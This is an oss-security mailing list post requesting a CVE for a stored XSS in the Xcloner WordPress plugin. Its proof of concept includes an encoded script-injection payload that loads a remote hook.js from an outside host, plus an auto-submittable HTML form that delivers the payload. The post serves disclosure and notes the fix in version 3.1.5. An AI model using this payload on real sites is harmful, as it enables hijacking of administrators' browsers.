Date: Wed, 27 Jul 2016 02:35:46 +0000 From: limingxing <limingxing@....cn> To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com> Subject: CVE request : a stored XSS in Xcloner for wordpress Hi I found a stored XSS in Xcloner for wordpress. The XSS filter can be bypass. Here is the plugin page https://wordpress.org/plugins/xcloner-backup-and-restore/ PoC In the "Corn setting" page(URL is "http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), set the "Backup name" (corn_bname) like "1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" <html> <form action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" method="post"> <input type="hidden" name="cron_bname" value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" /> <input type="submit" name="submit"> </form> </html> Fix way Update to version 3.1.5 Change https://plugins.trac.wordpress.org/changeset/1456784 Could you assign a CVE ID for it? Chen Ruiqi Codesafe Team
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.